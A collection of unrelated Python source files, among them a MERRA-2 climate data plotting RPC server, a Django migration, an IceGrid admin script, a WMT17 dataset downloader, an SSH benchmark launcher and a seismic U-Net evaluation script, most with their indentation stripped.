# print('Current Working Directory after directory change :{} '.format( os.getcwd()))
# else:
# print('The directory is present.')
# Save file to working directory
# print("File details: {}".format(urls))
try:
file_name = urls[0]['label']
file_ = open(file_name, 'wb')
file_.write(DataBody)
file_.close()
print (file_name, " is downloaded")
except OSError as e:
    # The HTTP transfer already completed above; only file I/O errors can occur here.
    print('Exception occurred while writing the file: {}'.format(e))
print('Download complete; the file was saved to the current working directory')
# logger.info("response from download:",response['fileName'])
# logger.info("type of response:",type(response))
response['fileName'] =file_name
# response['data'] = DataBody
return response
#unpack the data in message and process the message and return the output
def process_req(request):
json_data = json.loads(request)
#logger.info(json_data)
username = json_data['username']
password = json_data['password']
minLatitude = json_data['minLatitude']
maxLatitude = json_data['maxLatitude']
minLongitude = json_data['minLongitude']
maxLongitude = json_data['maxLongitude']
date = json_data['merraDate']
urls=downloadMerraData(username,password,minLatitude,maxLatitude, minLongitude, maxLongitude, date)
# logger.info("type of urls:",type(urls))
#logger.info("urls:",urls['fileName'])
return urls
# plot service function
def plotsService(body):
b64 = []
# logger.info("type of body:",type(body))
print("Filename:{}".format(body))
# print("Path exists:{}".format(body))
#logger.info(json_data)
file_name = body['fileName']
print("Path exists:{}".format(os.path.exists(file_name)))
#logger.info(file_name, " is downloaded")
print('Using previously downloaded file: {}'.format(file_name))
#Read in NetCDF4 file (add a directory path if necessary):
# print("This is the path:{}".format(os.getcwd()+"/"+file_name))
# print("Files in current directory: {}".format(os.listdir(os.getcwd())))
# print("Files in root directory: {}".format(os.listdir("/")))
# print("Filename in str {}".format(str(file_name)))
# path2 = os.PathLike()
# print("This is path: {}".format(path2))
data = Dataset(file_name, mode='r')
# data = body['data']
# Run the following line below to print MERRA-2 metadata. This line will print attribute and variable information. From the 'variables(dimensions)' list, choose which variable(s) to read in below.
#logger.info(data)
# Read in the longitude, latitude, and air temperature ('T') variables:
lons = data.variables['lon'][:]
lats = data.variables['lat'][:]
T2M = data.variables['T'][:,:,:]
# If the MERRA-2 file has multiple time and level indices, the following line extracts only the first time index and first vertical level.
# Note: changing T2M[0,0,:] to T2M[10,0,:] would select the 11th time index instead.
T2M = T2M[0,0,:]
#logger.info(T2M)
# Plot the data using matplotlib and cartopy
# Set the figure size, projection, and extent
fig = plt.figure(figsize=(8,4))
ax = plt.axes(projection=ccrs.Robinson())
ax.set_global()
ax.coastlines(resolution="110m",linewidth=1)
ax.gridlines(linestyle='--',color='black')
# Set contour levels, then draw the plot and a colorbar
clevs = np.arange(230,311,5)
plt.contourf(lons, lats, T2M, clevs, transform=ccrs.PlateCarree(),cmap=plt.cm.jet)
plt.title('MERRA-2 Air Temperature at 2m, January 2010', size=14)
cb = plt.colorbar(ax=ax, orientation="vertical", pad=0.02, aspect=16, shrink=0.8)
cb.set_label('K',size=12,rotation=0,labelpad=15)
cb.ax.tick_params(labelsize=10)
# Save the plot as a PNG image
fig.savefig('MERRA2_t2m.png', format='png', dpi=360)
flike = io.BytesIO()
plt.savefig(flike)
#logger.info(b64)
b64.append(base64.b64encode(flike.getvalue()).decode())
return b64
################################################### RABBITMQ CODE ###############################################################################
#callback function for the queue
def on_request(ch, method, props, body):
#logger.info(" [.] Received this data %s", body)
response = process_req(body)
print("Response:{} ".format(response['fileName']))
finalprocess=plotsService(response)
ch.basic_publish(exchange='', routing_key=props.reply_to, properties=pika.BasicProperties(correlation_id = props.correlation_id), body=json.dumps(finalprocess))
ch.basic_ack(delivery_tag=method.delivery_tag)
# We might want to run more than one server process.
# In order to spread the load equally over multiple servers we need to set the prefetch_count setting.
channel.basic_qos(prefetch_count=1)
# We declare a callback "on_request" for basic_consume, the core of the RPC server. It's executed when the request is received.
channel.basic_consume(queue='merra_plot_rx', on_message_callback=on_request)
print(" [x] Awaiting RPC requests")
channel.start_consuming()
channel.close()
################################################### RABBITMQ CODE ENDS ###############################################################################
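# Illustrative note (not part of the original script): process_req() above expects the
# RPC request body to be a JSON object with the keys shown below; the example values
# are made up.
#
#   {
#     "username": "someUser",
#     "password": "somePassword",
#     "minLatitude": 30, "maxLatitude": 35,
#     "minLongitude": -100, "maxLongitude": -95,
#     "merraDate": "2010-01-01"
#   }
#
# The reply published on props.reply_to is a JSON array of base64-encoded PNG plots.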
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
from math import ceil, sqrt
from PIL import Image
MODES = ('palette', 'grayscale')
PALETTE = [
0x000000, # 0 — black
0x000080, # 1 — maroon
0x008000, # 2 — green
0x008080, # 3 — olive
0x800000, # 4 — navy
0x800080, # 5 — purple
0x808000, # 6 — teal
0xc0c0c0, # 7 — silver
0x808080, # 8 — gray
0x0000ff, # 9 — red
0x00ff00, # 10 — lime
0x00ffff, # 11 — yellow
0xff0000, # 12 — blue
0xff00ff, # 13 — fuchsia
0xffff00, # 14 — aqua
0xffffff # 15 — white
]
def create_parser():
"""Create application argument parser."""
parser = argparse.ArgumentParser(
description='Convert given file to a bitmap.')
parser.add_argument('input', help='a file to convert')
parser.add_argument('output', help='path to the file to save')
parser.add_argument(
'-m', '--mode', default='palette', choices=MODES, dest='mode',
help='converting mode. One of: "palette" (each byte converted to two '
'pixels using 16-color palette, default), "grayscale" (each byte '
'value represented as grayscale)')
return parser
def convert(data, mode):
"""Convert given file to bitmap.
:param bytes data: input data to convert to a bitmap
:param str mode: one of the values:
* palette - represent each byte as two pixels using 16-color palette
* grayscale - represent each byte as one grayscale pixel using its value
:return: result image
:rtype: Image.Image
"""
if mode not in MODES:
raise ValueError('mode not one of the values: {}'.format(MODES))
length = len(data)
if mode == 'palette':
length *= 2
img_mode = 'L' if mode == 'grayscale' else 'RGB'
size = int(ceil(sqrt(length)))
img = Image.new(img_mode, (size, size))
for i in range(len(data)):
if mode == 'grayscale':
add_pixel(img, i, size, data[i])
elif mode == 'palette':
add_pixel(img, i * 2, size, PALETTE[data[i] // 16])
add_pixel(img, i * 2 + 1, size, PALETTE[data[i] % 16])
return img
def add_pixel(img, index, size, pixel):
"""Add a pixel to the image at (index % size, index / size).
:param Image.Image img: image to alter
:param int index: index of the byte
:param int size: width of the image
:param int pixel: pixel value to set
"""
img.putpixel((index % size, index // size), pixel)
def main():
args = create_parser().parse_args()
data = open(args.input, 'rb').read()
convert(data, args.mode).save(args.output)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Show the native byte order.
"""
#end_pymotw_header
import sys
print sys.byteorder
|
async def leaves(voice_client):
await voice_client.disconnect()
|
# Generated by Django 3.1 on 2021-10-26 22:07
from django.db import migrations, models
from django.contrib.auth.models import User
import reversion
ADMIN_USERNAME = 'biobankadmin'
def create_buffy_coat_sample_kind(apps, schema_editor):
SampleKind = apps.get_model("fms_core", "SampleKind")
admin_user = User.objects.get(username=ADMIN_USERNAME)
with reversion.create_revision(manage_manually=True):
reversion.set_comment("Add new sample kind buffy coat.")
reversion.set_user(admin_user)
buffy_coat = SampleKind.objects.create(name="BUFFY COAT", created_by_id=admin_user.id, updated_by_id=admin_user.id)
reversion.add_to_revision(buffy_coat)
class Migration(migrations.Migration):
dependencies = [
('fms_core', '0023_v3_4_0'),
]
operations = [
migrations.AlterField(
model_name='container',
name='kind',
field=models.CharField(choices=[('infinium gs 24 beadchip', 'infinium gs 24 beadchip'), ('tube', 'tube'), ('tube strip 2x1', 'tube strip 2x1'), ('tube strip 3x1', 'tube strip 3x1'), ('tube strip 4x1', 'tube strip 4x1'), ('tube strip 5x1', 'tube strip 5x1'), ('tube strip 6x1', 'tube strip 6x1'), ('tube strip 7x1', 'tube strip 7x1'), ('tube strip 8x1', 'tube strip 8x1'), ('96-well plate', '96-well plate'), ('384-well plate', '384-well plate'), ('tube box 3x3', 'tube box 3x3'), ('tube box 6x6', 'tube box 6x6'), ('tube box 7x7', 'tube box 7x7'), ('tube box 8x8', 'tube box 8x8'), ('tube box 9x9', 'tube box 9x9'), ('tube box 10x10', 'tube box 10x10'), ('tube box 21x10', 'tube box 21x10'), ('tube rack 8x12', 'tube rack 8x12'), ('box', 'box'), ('drawer', 'drawer'), ('freezer rack 2x4', 'freezer rack 2x4'), ('freezer rack 3x4', 'freezer rack 3x4'), ('freezer rack 4x4', 'freezer rack 4x4'), ('freezer rack 5x4', 'freezer rack 5x4'), ('freezer rack 6x4', 'freezer rack 6x4'), ('freezer rack 7x4', 'freezer rack 7x4'), ('freezer rack 10x5', 'freezer rack 10x5'), ('freezer rack 8x6', 'freezer rack 8x6'), ('freezer rack 11x6', 'freezer rack 11x6'), ('freezer rack 11x7', 'freezer rack 11x7'), ('freezer 3 shelves', 'freezer 3 shelves'), ('freezer 4 shelves', 'freezer 4 shelves'), ('freezer 5 shelves', 'freezer 5 shelves'), ('room', 'room')], help_text='What kind of container this is. Dictates the coordinate system and other container-specific properties.', max_length=25),
),
migrations.RunPython(
create_buffy_coat_sample_kind,
reverse_code=migrations.RunPython.noop,
),
]
|
"""
Author : Robin Phoeng
Date : 21/06/2018
"""
class Bar:
"""
A stress bar in the Fate SRD
box indexes start at 1
"""
def __init__(self,name):
self.name = name
self.boxes = []
def add_box(self,box):
"""
Adds a new box to the bar
:param box: a box, must be of Box type
"""
assert isinstance(box,Box)
self.boxes.append(box)
def remove_box(self,index):
"""
Removes a box at specified index.
indexes start at 1
:param index:
:return: Box removed
:raises: IndexError if no box exists at the index
"""
return self.boxes.pop(index-1)
def refresh(self):
"""
refreshes all boxes
"""
for box in self.boxes:
box.refresh()
def spend(self):
"""
spends (marks as used) all boxes
"""
for box in self.boxes:
box.spend()
def __getitem__(self, index):
"""
retrieves an item
we start our indexing at 1.
:param index: index, must be integer
:return: the Box at the index
"""
return self.boxes[index-1]
def __str__(self):
output = ""
output += self.name
for box in self.boxes:
output += " " + str(box)
return output
class Box:
"""
A bar consists of boxes
"""
def __init__(self,size):
self.size = size
self.used = False
def spend(self):
"""
mark the box as used
"""
self.used = True
def refresh(self):
"""
mark the box as unused
"""
self.used = False
def is_spent(self):
"""
query method
:return: true if used, false if not
"""
return self.used
def __str__(self):
if self.used:
return "~~[%d]~~" % self.size
else:
return "[%d]" % self.size
|
#!/usr/bin/python
"""Script to add, update, list or remove the grid application.
Usage::
grid_admin.py [add|update|list|remove|show-xml]
* add: adds or updates the grid application
* update: updates the application (assumes it is already loaded)
* list: lists all loaded applications
* remove: removes the grid application
* show-xml: shows the generated XML without updating anything
The application configuration is generated from ``application.yml``
and ``pillar/platform/*.sls``.
Each service corresponds to an executable Ice server. The ``application.yml``
file should have a ``services`` entry whose value is a list of service
descriptions, and an ``application`` entry whose value is the application name.
Each service must define (string) values for the following keys:
* name: name of the service from which adapter ids are generated
* run: path of the executable, relative to the APP_ROOT
The following additional keys are optional:
* replicated: may be True, False or (the string) both
* nodes: may be a node id (string) or list of node ids
If ``replicated`` is False or absent, an adapter with id equal to the name is
generated. This means that the full adapter id on a given node is
``<name>-<node>.<name>``, e.g. ``Printer-node2.Printer``.
If ``replicated`` is True, an adapter-id of the form ``<name>Rep`` is
generated so that the full adapter id on a given node is
``<name>-<node>.<name>Rep``, e.g. ``Printer-node2.PrinterRep``.
Furthermore, the adapter is added to a replica group named ``<name>Group``.
If ``replicated`` is ``both``, both of the above adapters are generated.
When ``nodes`` is not specified, the service is generated on all nodes.
If ``nodes`` is a node id, the service is generated on that node only,
while if it is a list of node ids it is generated for just those nodes.
"""
import os
import sys
import yaml
from icegrid_config import ICE_REG_HOST
APP_ROOT = os.path.abspath(__file__).rsplit('/', 2)[0]
PLATFORM_SLS = os.path.join(APP_ROOT, 'pillar/platform')
GRID_XML_PATH = os.path.join(APP_ROOT, 'grid/grid.xml')
CLIENT_CFG = os.path.join(APP_ROOT, 'grid/client.cfg')
APP_CONF = yaml.load(open(os.path.join(APP_ROOT, 'application.yml')))
APP_NAME = APP_CONF['application']
ADMIN_CMD = "icegridadmin --Ice.Config=%s -ux -px -e '%%s'" % CLIENT_CFG
APP_FRAG = """\
<icegrid>
<application name="%s">
%s%s </application>
</icegrid>
"""
NODE_FRAG = """
<node name="%s">
%s </node>
"""
ADAPTER_FRAG = """\
<adapter name="%(name)s" endpoints="tcp"/>
"""
REPL_ADAPTER_FRAG = """\
<adapter name="%(name)sRep" replica-group="%(name)sGroup" endpoints="tcp"/>
"""
SERVER_FRAG = """\
<server id="%(name)s-%(node)s" exe="%(run)s" activation="on-demand">
%(opt)s%(adapter)s </server>
"""
OPT_FRAG = """\
<option>%s</option>
"""
GROUP_FRAG = """\
<replica-group id="%sGroup">
<load-balancing type="round-robin" />
</replica-group>
"""
def doAdmin(cmd):
return os.system(ADMIN_CMD % cmd)
def queryAdmin(cmd):
return os.popen(ADMIN_CMD % cmd)
def gridXML():
hosts = {}
for name in os.listdir(PLATFORM_SLS):
if not name.endswith('.sls'):
continue
try:
config = yaml.load(open(os.path.join(PLATFORM_SLS, name)))
if config['registry'] == ICE_REG_HOST:
hosts.update(config['hosts'])
except Exception, e:
print >>sys.stderr, 'Warning: exception %s loading %s' % (e, name)
groups_xml = []
services = APP_CONF['services']
for service in services:
args = service.get('args', [])
if isinstance(args, basestring):
args = [args]
if 'setup' in service:
assert 'run' not in service, "Service %(name)s may specify only one of 'setup' or 'run'" % service
service['run'] = 'servers/gen_server.py'
args.insert(0, service['setup'])
if service['run'].endswith('.py'):
args.insert(0, service['run'])
service['run'] = 'python'
if isinstance(service.get('nodes'), basestring):
service['nodes'] = [service['nodes']]
adapter_xml = []
if service.get('replicated') in (None, False, 'both'):
adapter_xml.append(ADAPTER_FRAG % service)
if service.get('replicated') in (True, 'both'):
adapter_xml.append(REPL_ADAPTER_FRAG % service)
groups_xml.append(GROUP_FRAG % service['name'])
opts = [OPT_FRAG % arg for arg in args]
service['adapter'] = ''.join(adapter_xml)
service['opt'] = ''.join(opts)
node_xml = []
for hostname in sorted(hosts):
node = 'node' + hostname.rsplit('-', 1)[-1]
server_xml = []
for service in services:
nodes = service.get('nodes')
if nodes is not None and node not in nodes:
continue
service['node'] = node
server_xml.append(SERVER_FRAG % service)
node_xml.append(NODE_FRAG % (node, ''.join(server_xml)))
return APP_FRAG % (APP_NAME, ''.join(groups_xml), ''.join(node_xml))
def writeGridXML():
xml = gridXML()
with open(GRID_XML_PATH, 'w') as out:
out.write(xml)
def main():
if 'add' in sys.argv[1:]:
apps = [l.strip() for l in queryAdmin('application list')]
what = 'update' if APP_NAME in apps else 'add'
writeGridXML()
doAdmin('application %s %s' % (what, GRID_XML_PATH))
elif 'update' in sys.argv[1:]:
writeGridXML()
doAdmin('application update %s' % GRID_XML_PATH)
elif 'list' in sys.argv[1:]:
for l in queryAdmin('application list'):
print l.strip()
elif 'remove' in sys.argv[1:]:
doAdmin('application remove %s' % APP_NAME)
elif 'show-xml' in sys.argv[1:]:
print gridXML(),
if __name__ == '__main__':
main()
|
"""Special rectangles."""
__all__ = [
"ScreenRectangle",
"FullScreenRectangle",
"FullScreenFadeRectangle",
"PictureInPictureFrame",
]
from manim.utils.deprecation import deprecated
from .. import config
from ..constants import *
from ..mobject.geometry import Rectangle
from ..utils.color import BLACK
class ScreenRectangle(Rectangle):
def __init__(self, aspect_ratio=16.0 / 9.0, height=4, **kwargs):
super().__init__(width=aspect_ratio * height, height=height, **kwargs)
@property
def aspect_ratio(self):
"""The aspect ratio.
When set, the width is stretched to accommodate
the new aspect ratio.
"""
return self.width / self.height
@aspect_ratio.setter
def aspect_ratio(self, value):
self.stretch_to_fit_width(value * self.height)
class FullScreenRectangle(ScreenRectangle):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = config["frame_height"]
@deprecated(
since="v0.12.0",
until="v0.13.0",
message="This method is deprecated due to decluttering purpose.",
replacement="FullScreenRectangle(stroke_width=0, fill_color=BLACK, fill_opacity=0.7)",
)
class FullScreenFadeRectangle(FullScreenRectangle):
def __init__(self, stroke_width=0, fill_color=BLACK, fill_opacity=0.7, **kwargs):
super().__init__(
stroke_width=stroke_width,
fill_color=fill_color,
fill_opacity=fill_opacity,
**kwargs
)
@deprecated(
since="v0.12.0",
until="v0.13.0",
message="This method is deprecated due to decluttering purpose.",
)
class PictureInPictureFrame(Rectangle):
def __init__(self, height=3, aspect_ratio=16.0 / 9.0, **kwargs):
super().__init__(width=aspect_ratio * height, height=height, **kwargs)
@property
def aspect_ratio(self):
"""The aspect ratio.
When set, the width is stretched to accommodate
the new aspect ratio.
"""
return self.width / self.height
@aspect_ratio.setter
def aspect_ratio(self, value):
self.stretch_to_fit_width(value * self.height)
|
# Copyright 2018 MLBenchmark Group. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download and preprocess WMT17 ende training and evaluation datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
import sys
import tarfile
import urllib
import urllib.request
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
logging.getLogger().setLevel(logging.INFO)
# Data sources for training/evaluating the transformer translation model.
_TRAIN_DATA_SOURCES = [
{
"url": "http://data.statmt.org/wmt17/translation-task/"
"training-parallel-nc-v12.tgz",
"input": "news-commentary-v12.de-en.en",
"target": "news-commentary-v12.de-en.de",
},
{
"url": "http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz",
"input": "commoncrawl.de-en.en",
"target": "commoncrawl.de-en.de",
},
{
"url": "http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz",
"input": "europarl-v7.de-en.en",
"target": "europarl-v7.de-en.de",
},
]
_EVAL_DATA_SOURCES = [
{
"url": "http://data.statmt.org/wmt17/translation-task/dev.tgz",
"input": "newstest2013.en",
"target": "newstest2013.de",
}
]
def find_file(path, filename, max_depth=5):
"""Returns full filepath if the file is in path or a subdirectory."""
for root, dirs, files in os.walk(path):
if filename in files:
return os.path.join(root, filename)
# Don't search past max_depth
depth = root[len(path) + 1:].count(os.sep)
if depth > max_depth:
del dirs[:] # Clear dirs
return None
###############################################################################
# Download and extraction functions
###############################################################################
def get_raw_files(raw_dir, data_source):
"""Return raw files from source. Downloads/extracts if needed.
Args:
raw_dir: string directory to store raw files
data_source: dictionary with
{"url": url of compressed dataset containing input and target files
"input": file with data in input language
"target": file with data in target language}
Returns:
dictionary with
{"inputs": list of files containing data in input language
"targets": list of files containing corresponding data in target language
}
"""
raw_files = {
"inputs": [],
"targets": [],
} # keys
for d in data_source:
input_file, target_file = download_and_extract(
raw_dir, d["url"], d["input"], d["target"])
raw_files["inputs"].append(input_file)
raw_files["targets"].append(target_file)
return raw_files
def download_report_hook(count, block_size, total_size):
"""Report hook for download progress.
Args:
count: current block number
block_size: block size
total_size: total size
"""
percent = int(count * block_size * 100 / total_size)
print("\r%d%%" % percent + " completed", end="\r")
def download_from_url(path, url):
"""Download content from a url.
Args:
path: string directory where file will be downloaded
url: string url
Returns:
Full path to downloaded file
"""
filename = url.split("/")[-1]
found_file = find_file(path, filename, max_depth=0)
if found_file is None:
filename = os.path.join(path, filename)
logging.info("Downloading from %s to %s." % (url, filename))
inprogress_filepath = filename + ".incomplete"
inprogress_filepath, _ = urllib.request.urlretrieve(
url, inprogress_filepath, reporthook=download_report_hook)
# Print newline to clear the carriage return from the download progress.
print()
os.rename(inprogress_filepath, filename)
return filename
else:
logging.info("Already downloaded: %s (at %s)." % (url, found_file))
return found_file
def download_and_extract(path, url, input_filename, target_filename):
"""Extract files from downloaded compressed archive file.
Args:
path: string directory where the files will be downloaded
url: url containing the compressed input and target files
input_filename: name of file containing data in source language
target_filename: name of file containing data in target language
Returns:
Full paths to extracted input and target files.
Raises:
OSError: if the download/extraction fails.
"""
logging.info('Downloading and extracting data to: %s' % path)
# Check if extracted files already exist in path
input_file = find_file(path, input_filename)
target_file = find_file(path, target_filename)
if input_file and target_file:
logging.info("Already downloaded and extracted %s." % url)
return input_file, target_file
# Download archive file if it doesn't already exist.
compressed_file = download_from_url(path, url)
# Extract compressed files
logging.info("Extracting %s." % compressed_file)
with tarfile.open(compressed_file, "r:gz") as corpus_tar:
corpus_tar.extractall(path)
# Return filepaths of the requested files.
input_file = find_file(path, input_filename)
target_file = find_file(path, target_filename)
if input_file and target_file:
return input_file, target_file
raise OSError("Download/extraction failed for url %s to path %s" %
(url, path))
def make_dir(path):
if not os.path.isdir(path):
logging.info("Creating directory %s" % path)
os.mkdir(path)
def main(unused_argv):
"""Obtain training and evaluation data for the Transformer model."""
make_dir(FLAGS.raw_dir)
make_dir(FLAGS.data_dir)
# Get paths of download/extracted training and evaluation files.
print("Step 1/4: Downloading data from source")
train_files = get_raw_files(FLAGS.raw_dir, _TRAIN_DATA_SOURCES)
eval_files = get_raw_files(FLAGS.raw_dir, _EVAL_DATA_SOURCES)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_dir", "-dd", type=str, default="/tmp/translate_ende",
help="[default: %(default)s] Directory for where the "
"translate_ende_wmt32k dataset is saved.",
metavar="<DD>")
parser.add_argument(
"--raw_dir", "-rd", type=str, default="/tmp/translate_ende_raw",
help="[default: %(default)s] Path where the raw data will be downloaded "
"and extracted.",
metavar="<RD>")
FLAGS, unparsed = parser.parse_known_args()
main(sys.argv)
|
#! /usr/bin/env python
## include packages
import commands
import subprocess
import sys
import signal
import time
import xml.etree.cElementTree as ET ## parsing the xml file
from run_util import print_with_tag
#====================================#
## config parameters and global parameters
## default mac set
mac_set = [ ]
## bench config parameters
worker_num = 1;
scale_factor = worker_num;
nthread = 8
mac_num = 2
port = 8090
#port = 9080
config_file = "config.xml"
## start parsing input parameters
exe = ""
args = ""
base_cmd = "./%s %s"
#====================================#
## class definitions
class GetOutOfLoop(Exception):
## a dummy class for exit outer loop
pass
#====================================#
## helper functions
def copy_file(f):
for host in mac_set:
subprocess.call(["scp","./%s" % f,"%s:%s" % (host,"~")])
def kill_servers():
# print "ending ... kill servers..."
kill_cmd = "pkill %s" % exe
for i in xrange(len(mac_set)):
subprocess.call(["ssh","-n","-f",mac_set[i],kill_cmd])
return
## singal handler
def signal_int_handler(signal, frame):
print_with_tag("ENDING","send ending messages in SIGINT handler")
print_with_tag("ENDING","kill processes")
kill_servers()
sys.exit(0)
return
def parse_input():
global config_file, exe, args, base_cmd
if (len(sys.argv)) > 1: ## config file name
config_file = sys.argv[1]
if (len(sys.argv)) > 2: ## exe
exe = sys.argv[2]
if (len(sys.argv)) > 3: ## cmdline arg to exe
args = sys.argv[3]
base_cmd = (base_cmd % (exe, args)) + " -n %d" + " 1>log 2>&1 &"
return
# print "starting with config file %s" % config_file
def parse_bench_parameters(f):
global mac_set, mac_num
tree = ET.ElementTree(file=f)
root = tree.getroot()
assert root.tag == "param"
mac_set = []
for e in root.find("network").findall("a"):
mac_set.append(e.text.strip())
return
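## Illustrative example (added note, not part of the original script): the
## minimal shape of the config file that parse_bench_parameters() expects.
## Hostnames below are placeholders.
##
##   <param>
##     <network>
##       <a>host0</a>
##       <a>host1</a>
##     </network>
##   </param>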
def start_servers(macset,config,bcmd):
assert(len(macset) >= 1)
for i in xrange(1,len(macset)):
cmd = bcmd % (i)
print cmd
subprocess.call(["ssh","-n","-f",macset[i],cmd])
## local process is executed right here
cmd = bcmd % 0
subprocess.call(cmd.split())
return
def prepare_files(files):
print "Start preparing start file"
for f in files:
copy_file(f)
return
#====================================#
## main function
def main():
global base_cmd
parse_input() ## parse input from command line
parse_bench_parameters(config_file) ## parse bench parameter from config file
print "[START] Input parsing done."
kill_servers()
prepare_files([exe,config_file]) ## copy related files to remote
print "[START] cleaning remaining processes."
time.sleep(1) ## ensure that all related processes are cleaned
signal.signal(signal.SIGINT, signal_int_handler) ## register signal interrupt handler
start_servers(mac_set,config_file,base_cmd) ## start server processes
while True:
## forever loop
time.sleep(10)
return
#====================================#
## the code
if __name__ == "__main__":
main()
|
# ============================================================== #
# Fusnet eval #
# #
# #
# Eval fusnet with processed dataset in tfrecords format #
# #
# Author: Karim Tarek #
# ============================================================== #
from __future__ import print_function
import quakenet.data_pipeline_unet as dp
import numpy as np
#np.set_printoptions(threshold='nan')
import tensorflow as tf
import quakenet.config as config
import argparse
import os
import time
import glob
import setproctitle
import unet
import fnmatch
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
# Basic model parameters as external flags.
FLAGS = None
def maybe_save_images(predict_images,images, filenames):
"""
Save images to disk
-------------
Args:
predict_images: numpy array of predicted traces [batch_size, n_points]
images: numpy array of input traces [batch_size, n_points, n_channels]
filenames: list of filenames corresponding to the images [batch_size]
"""
if FLAGS.output_dir is not None:
batch_size = predict_images.shape[0]
for i in xrange(batch_size):
image_array = predict_images[i, :]
image_array1 = images[i, :,1]
print (image_array.shape,image_array1.shape)
indexs=list(range(0,image_array.shape[0]))
file_path = os.path.join(FLAGS.output_dir, filenames[i])
ax = plt.subplot(211)
plt.plot(indexs,image_array)
plt.subplot(212, sharex=ax)
plt.plot(indexs, image_array1)
plt.savefig(file_path)
plt.close()
def evaluate():
"""
Eval unet using specified args:
"""
if FLAGS.events:
summary_dir = os.path.join(FLAGS.checkpoint_path,"events")
while True:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_path)
if FLAGS.eval_interval < 0 or ckpt:
print ('Evaluating model')
break
print ('Waiting for training job to save a checkpoint')
time.sleep(FLAGS.eval_interval)
#data_files, data_size = load_datafiles(FLAGS.tfrecords_prefix)
setproctitle.setproctitle('quakenet')
tf.set_random_seed(1234)
cfg = config.Config()
cfg.batch_size = FLAGS.batch_size
cfg.add = 1
cfg.n_clusters = FLAGS.num_classes
cfg.n_clusters += 1
cfg.n_epochs = 1
model_files = [file for file in os.listdir(FLAGS.checkpoint_path) if
fnmatch.fnmatch(file, '*.meta')]
for model_file in sorted(model_files):
step = model_file.split(".meta")[0].split("-")[1]
print (step)
try:
model_file = os.path.join(FLAGS.checkpoint_path, model_file)
# data pipeline for positive and negative examples
pos_pipeline = dp.DataPipeline(FLAGS.tfrecords_dir, cfg, True)
# images:[batch_size, n_channels, n_points]
images = pos_pipeline.samples
labels = pos_pipeline.labels
logits = unet.build_30s(images, FLAGS.num_classes, False)
predicted_images = unet.predict(logits, FLAGS.batch_size, FLAGS.image_size)
accuracy = unet.accuracy(logits, labels)
loss = unet.loss(logits, labels,FLAGS.weight_decay_rate)
summary_writer = tf.summary.FileWriter(summary_dir, None)
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
sess = tf.Session()
sess.run(init_op)
saver = tf.train.Saver()
#if not tf.gfile.Exists(FLAGS.checkpoint_path + '.meta'):
if not tf.gfile.Exists(model_file):
raise ValueError("Can't find checkpoint file")
else:
print('[INFO ]\tFound checkpoint file, restoring model.')
saver.restore(sess, model_file.split(".meta")[0])
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess = sess, coord = coord)
#metrics = validation_metrics()
global_accuracy = 0.0
global_p_accuracy = 0.0
global_s_accuracy = 0.0
global_n_accuracy = 0.0
global_loss = 0.0
n = 0
#mean_metrics = {}
#for key in metrics:
# mean_metrics[key] = 0
#pred_labels = np.empty(1)
#true_labels = np.empty(1)
try:
while not coord.should_stop():
acc_seg_value,loss_value,predicted_images_value,images_value = sess.run([accuracy,loss,predicted_images,images])
accuracy_p_value=acc_seg_value[1][1]
accuracy_s_value=acc_seg_value[1][2]
accuracy_n_value=acc_seg_value[1][0]
#pred_labels = np.append(pred_labels, predicted_images_value)
#true_labels = np.append(true_labels, images_value)
global_p_accuracy += accuracy_p_value
global_s_accuracy += accuracy_s_value
global_n_accuracy += accuracy_n_value
global_loss += loss_value
# print true_labels
#for key in metrics:
# mean_metrics[key] += cfg.batch_size * metrics_[key]
filenames_value=[]
# for i in range(FLAGS.batch_size):
# filenames_value.append(str(step)+"_"+str(i)+".png")
#print (predicted_images_value[:,100:200])
if (FLAGS.plot):
maybe_save_images(predicted_images_value, images_value,filenames_value)
#s='loss = {:.5f} | det. acc. = {:.1f}% | loc. acc. = {:.1f}%'.format(metrics['loss']
print('[PROGRESS]\tAccuracy for current batch: | P. acc. =%.5f| S. acc. =%.5f| '
'noise. acc. =%.5f.' % (accuracy_p_value,accuracy_s_value,accuracy_n_value))
#n += cfg.batch_size
n += 1
# step += 1
print (n)
except KeyboardInterrupt:
print ('stopping evaluation')
except tf.errors.OutOfRangeError:
print ('Evaluation completed ({} epochs).'.format(cfg.n_epochs))
print ("{} windows seen".format(n))
#print('[INFO ]\tDone evaluating in %d steps.' % step)
if n > 0:
# average the accumulated loss over all evaluated batches
global_loss /= n
summary = tf.Summary(value=[tf.Summary.Value(tag='loss/val', simple_value=global_loss)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
global_accuracy /= n
global_p_accuracy /= n
global_s_accuracy /= n
global_n_accuracy /= n
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val', simple_value=global_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_p', simple_value=global_p_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_s', simple_value=global_s_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
summary = tf.Summary(value=[tf.Summary.Value(tag='accuracy/val_noise', simple_value=global_n_accuracy)])
if FLAGS.save_summary:
summary_writer.add_summary(summary, global_step=step)
